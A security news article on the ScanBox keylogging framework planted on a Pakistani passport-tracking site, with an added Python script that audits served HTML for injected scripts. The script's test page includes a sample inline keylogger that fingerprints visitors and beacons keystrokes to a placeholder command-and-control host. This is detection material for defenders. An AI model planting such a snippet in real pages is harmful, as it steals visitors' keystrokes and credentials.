A Pakistani government site used as a tracking platform for passport applications has been compromised to deliver a ScanBox framework payload which captures the visitors’ machine information and logs their keystrokes.
The breached website is tracking.dgip.gov[.]pk, a sub-domain of the Directorate General of Immigration & Passport of the Pakistani government.
Framework was previously used by APT groups
“It was then seen again in 2017 suspected to be used by the Stone Panda APT group, and once more in 2018 in connection with LuckyMouse. With every appearance, it seems to have evolved in terms of the kinds of information it gathers,” says Trustwave’s SpiderLabs Research team which discovered the intrusion.
The researchers observed that the ScanBox framework version used to compromise this Pakistani passport application tracking platform “also tried to detect whether the visitor has any of a list of 77 endpoint products installed, most of these are security products, with a few decompression and virtualization tools.”
Since the ScanBox reconnaissance tool is usually deployed to collect as much information as possible about a website's visitors, the compromised website could potentially be used as part of a watering hole attack aimed at the specific group of people who rely on it.
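The article describes the injected payload only by its behaviour: it profiles the visitor's machine and logs keystrokes from inside the page. A site owner can look for that behaviour in their own served HTML. The following is an added example written for this article, not Trustwave's tooling and not ScanBox's code; it flags script tags loaded from hosts outside a first-party allowlist and inline scripts that combine keystroke hooks, fingerprinting calls and beaconing. The page samples, the hostnames and the indicator lists are constructed for the example.

```python
"""Defender-side audit of served HTML for injected reconnaissance scripts.

Added example (not ScanBox's code, not Trustwave's tooling). Heuristics only:
a hit means "look at this", not "this is malicious".
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator patterns (constructed for this example, not taken from any sample).
KEYLOG_HOOKS = re.compile(
    r"""\b(onkey(?:down|press|up)|addEventListener\(\s*['"]key(?:down|press|up)['"])""")
FINGERPRINT_HOOKS = re.compile(
    r"\bnavigator\.(?:userAgent|plugins|platform|language)\b|\bscreen\.(?:width|height)\b")
EXFIL_HOOKS = re.compile(r"\bnew\s+Image\s*\(|XMLHttpRequest|\bfetch\s*\(|sendBeacon")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_page(html, first_party_hosts):
    """Return a list of (kind, detail) findings for one HTML document."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        # Relative URLs have no hostname and are treated as first-party.
        host = urlparse(src).hostname
        if host and host not in first_party_hosts:
            findings.append(("external-script", host))
    for body in parser.inline:
        tags = []
        if KEYLOG_HOOKS.search(body):
            tags.append("keystroke-capture")
        if FINGERPRINT_HOOKS.search(body):
            tags.append("fingerprinting")
        if EXFIL_HOOKS.search(body):
            tags.append("beaconing")
        # A login form legitimately hooks keys; require two indicators together.
        if len(tags) >= 2:
            findings.append(("inline-script", "+".join(tags)))
    return findings


# Constructed sample pages and allowlist (hypothetical hostnames).
FIRST_PARTY = {"portal.example.gov"}

BENIGN_PAGE = """<html><body>
<script src="/static/app.js"></script>
<script src="https://portal.example.gov/static/form.js"></script>
<script>document.getElementById('f').onsubmit = function(){ return validate(); };</script>
</body></html>"""

SUSPECT_PAGE = """<html><body>
<script src="//tracker.example.invalid/i.js"></script>
<script>
var keys = '', info = navigator.userAgent + '|' + screen.width;
document.onkeypress = function(e){ keys += String.fromCharCode(e.which); };
new Image().src = '//c2.example.invalid/r?d=' + btoa(info + keys);
</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("suspect", SUSPECT_PAGE)):
        print(name, audit_page(page, FIRST_PARTY))
```

Run against a copy of each page the site serves (a crawl of your own origin) and diff the findings over time; a new external host or a new inline script that trips two indicators is the signal the article's low URL-scanner detection rate would otherwise hide.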
Low detection rate for the compromised domain
Even though the attackers used a well-known malicious tool on the compromised website to collect visitor information, scans of the domain using VirusTotal, Zscaler, and Symantec’s URL scanners “show an alarming lack of detection.”
The researchers first detected the compromised website on March 2. Although there is no way to pinpoint an exact time range for the breach, during the first day they monitored the domain the attackers managed to "collect information on at least 70 unique site visitors, about a third of them with recorded credentials."
The research team also managed to scan the ScanBox server used to collect and store the stolen data and got only two detections of malicious content; the server went offline on March 7, one day after they started digging deeper.
SpiderLabs Research received no response after contacting the website admins to report the breach. However, the domain was no longer marked as malicious in VirusTotal scans performed by internetnewsblog on March 13.
Despite this, Trustwave’s researchers state that, while the Scanbox server currently appears inactive, “the infection indicates that the attack has some level of access to the site, and so it’s likely that the server could return to activity or be replaced with a different piece of malicious code at the attacker’s will.”
Last month, researchers from Trustwave also disclosed that the website of the Bangladeshi Embassy in Cairo was compromised to distribute malicious Word documents.
The website would automatically download the documents onto visitors' computers; once opened, the documents installed malware downloaders by exploiting the EPS (Encapsulated PostScript) remote code execution vulnerability CVE-2017-0261.